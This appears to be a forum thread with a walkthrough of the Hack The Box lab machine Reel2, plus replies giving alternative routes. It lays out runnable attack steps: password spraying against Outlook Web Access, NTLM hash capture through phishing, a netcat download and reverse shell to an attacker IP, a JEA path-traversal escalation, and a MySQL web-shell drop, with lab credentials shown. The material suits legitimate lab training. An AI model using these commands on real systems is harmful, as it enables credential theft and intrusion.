TUTORIAL Reel2 Detailed Writeup
by y0ukn0wm3 - October 09, 2020 at 04:18 PM
#1
-> Run nmap
-> http(80), https(443), http-proxy(8080) are open
-> Enumerating http reveals nothing
-> Enumerating https:
gobuster dir -u https://reel2.htb -w /usr/share/Seclists/Discovery/DNS/dns-Jhaddix.txt -b 404,403 -k

/owa
-> Outlook WebApp is available on port 443 which requires creds
-> On port 8080 create a user account and login, going through the posts user sven has a post says summer is hot
-> Gather all the user name in a txt file, gather all related to summer in a txt file call it as pass

Generate user names from this script: https://pastebin.com/QXrDwkW2
Obtained passwords: grep -R Summer /usr/share/Seclists | tee pass.txt

-> With the valid user name and passwords in hand, lets bruteforce the OWA login

Bruteforce tool: https://github.com/byt3bl33d3r/SprayingToolkit

-> Bruteforce owa
atomizer owa user.txt pass.txt -t 5 -i 0:0:5 10.10.10.210

-> Valid login Creds obtianed
s.svensson : Summer2020
-> login to OWA in https://10.10.10.210/OWA
-> site another language, open in chromium -> Always translate
-> Going around, while compiling a new message, All the users are obtained select all and click the button [To]
-> All the users are  added to the To section
-> Start Reeling(Phising)
-> With the responder on,
responder -I tun0
-> Give the subject asyou wish, body as your HTB IP (10.10.*.*)
-> An NTML has will be obtained in the responder, why does it work ??

here is the answer: https://www.ired.team/offensive-security...ng-outlook

-> Cracking the obtained ntml hash
hashcat -m5600
k.svensson::htb:3c65c6a9f48fd29d:C6FC6FDA6E2DDECB69CA7D60116D0C64:01010000000000009B72CCC37A9DD601C81A9A8F2A2D6E57000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000000000000000000000004000004B049FD36CE4F996354E616797C4AF3EF2DFBAE746123EB9F687F33FB6789C8A0A001000000000000000000000000000000000000900200048005400540050002F00310030002E00310030002E00310034002E0032003000000000000000000

-> password is obtained, k.svensson: kittycat1
-> Logging in with winrm as port 5985 is open fails
-> using Powershell to login
-> Install powershell for Debian
sudo apt-get install powershell

after installation pwsh gives access to powershell

pwsh

-> in the pwsh powershell
-> Login to the machine with the PSSession

Enter-PSSession -Computer 10.10.10.210 -credential HTB\k.svensson -Authentication Negotiate

-> Provide the password to obtain shell
-> Now commands like dir, ls, cd, whoami wont work. $env:username and $env:domainname works
-> Execute powershell commands with the script block

https://stackoverflow.com/questions/1808...r-a-script

[10.10.10.210]: P> &{ cd ../Desktop }
[10.10.10.210]: PS>& { ls }         


    Directory: C:\Users\k.svensson\Desktop


Mode                LastWriteTime        Length Name                             
----                -------------        ------ ----                             
-a----        7/30/2020  1:19 PM          2428 Sticky Notes.lnk                 
-ar---        10/9/2020  7:21 AM            34 user.txt                         


[10.10.10.210]: P> &{ type user.txt}

-> Now taransfer nc and obtain a reverse shell

[10.10.10.210]: P> &{ iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'}
[10.10.10.210]: P> &{ cd 'C:\Windows\System32\spool\drivers\color\'}
[10.10.10.210]: P> &{ ./nc.exe 10.10.xx.xx 1234 -e powershell.exe}

-> Before entering the  last command, listen on port 1234
-> now the reverse shell is obtained
-> Enumerating basic stuffs.. nothing found enumerating log files

dir /s /b *.log

-> looking at the 000003.log the password for the jea_test_account is enumerated

jae_test_account : [email protected]^%@#1

-> Looking at the basic jae_test_account.psrc and .pssc the Check-File commad loads if the contents are fom the "C:\ProgramData"
-> Create a Symlink

PowerShell:
md adminDir (in the ProgramData Dir)
New-Junction -Link 'C:\ProgramData\adminDir' -Target 'C:\Users\Administrator'

(or)
CMD:
mklink /J root c:\Users\Administrator\Desktop

-> Now this is accessable only by the jea_test_account
-> Enter the Powershell session as jea_test_account which will not work
-> For the jea_account_test credentials has to be passed as an cmdlet object

$username = "jea_test_account"
$password = ConvertTo-SecureString "[email protected]^%@#1" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList ($username, $password)

Enter-PSSession -Computer 10.10.10.210 -credential $cred -ConfigurationName jea_test_account -verbose -debug -Authentication Negotiate

-> Now you cannot execute code like you did for the k.svensson account
-> The command gcm which is GetCommand lists the available command the previously observed Check-File command is enumerated
-> Time to obtain root.txt, as we symblinked the Administrator directory lets get out the root.txt

Check-File C:\programdata\root\Desktop\root.txt


Thanks:
Completed this awesome machine with the help of my friend cyberwr3nch and with the help of the RF community
Sylz and some ppl

My friend:
make sure to check out my friends github:
https://github.com/cyberwr3nch/hackthebox

Donate:
Like this writeup Donate us:
Donate me with credits here:
Donate Hidden Content
You must register or login to view this content.


Donate my friend who is looking an oppurtunity to complete OSCP or to obtain PRO labs:
https://www.buymeacoffee.com/cyberwr3nch
#2
Nice sharing , 8 credits is for you : )
#3
(October 09, 2020 at 04:46 PM)BL4CK-3Y3 Wrote: Nice sharing , 8 credits is for you : )

Thanks consider donating my friend too if you wish
#4
i check Check-File C:\programdata\root\Desktop\root.txt
i try use symbol-ink but not helpful
how read root.txt
#5
nice sharing man, i will make your writeup looks better...
#6
(October 10, 2020 at 10:33 AM)cypherdz23 Wrote: i check Check-File C:\programdata\root\Desktop\root.txt
i try use symbol-ink but not helpful
how read root.txt

Create a junction link with mklink /J comamnd and login as Jea_account_test to read the root.txt
Check-File C:\programdata\root\Desktop\root.txt

(October 10, 2020 at 11:19 AM)lucifer113 Wrote: nice sharing man, i will make your writeup looks better...

Yeah you just add the pictures
#7
its not working. fyi ALL

New-Junction -Link 'C:\ProgramData\adminDir' -Target 'C:\Users\Administrator'

you can use this one

New-Item -ItemType Junction -Path 'C:\ProgramData\adminDir' -Target 'C:\Users\Administrator'

gl next
#8
I don't see the content in 00003.log file
Type command is give some jibberish
And this command is not working
dir /s /b *.log
#9
The link to the directory isn’t necessary, the validation is basic and using the path c:\programdata\..\users\administrator\desktop\root.txt works with the check-file command that the JEA user is allowed to run.
#10
(October 10, 2020 at 05:12 PM)jane506 Wrote: The link to the directory isn’t necessary, the validation is basic and using the path c:\programdata\..\users\administrator\desktop\root.txt works with the check-file command that the JEA user is allowed to run.


thats new for me to hear... like i mentioned its not only my work me and my frnd discussed and worked we looked for things weather it avails in the symlink type

(October 10, 2020 at 03:59 PM)Jockerjock Wrote: I don't see the content in 00003.log file
Type command is give some jibberish
And this command is not working
dir /s /b *.log

the dir /s /b *.log is a cmd command... be sure to switch from ps to cmd
#11
For a real root shell. ;)

PS C:\> whoami
nt authority\system
PS C:\> hostname
Reel2

1. as k.svensson cmd /c mklink /J xampp c:\xampp\
2. as jea_test_account check-file c:\programdata\xampp\htdocs\social\config\*.php
$servername = "localhost";
$username = "root";
$password = "Gregswd123FAEytjty";
$dbname = "wallstant";

3. on kali host chisel server -p 9005 --reverse
4. as k.svensson. copy \\10.10.xx.x\share\shell.php c:\programdata\
5. cmd /c \\10.10.xx.x\share\chisel.exe client 10.10.xx.x:9005 R:3306:127.0.0.1:3306
6. mysql -h 127.0.0.1 -u root -p Wallstant --password=Gregswd123FAEytjty

create table roothell (line blob);
INSERT INTO roothell values(load_file('/programdata/shell.php'));
SELECT * FROM Wallstant.roothell INTO DUMPFILE '/xampp/htdocs/social/shell.php';

7. Open your shell in the browser http://10.10.10.210:8080/shell.php and System!
#12
I use this command in cmd not in ps
dir /s /b *.
But result is none anyone help pls

Possibly Related Threads…
Thread Author Replies Views Last Post
SELLING HTB Insane - Stacked Detailed Writeup mobile1 0 89 2 hours ago
Last Post: mobile1
SELLING Fingerprint HTB Machine - Detailed Writeup CatPy 1 171 7 hours ago
Last Post: CatPy
SELLING EarlyAccess HTB Machine - Detailed Writeup CatPy 1 140 7 hours ago
Last Post: CatPy

 Users browsing this thread: 2 Guest(s)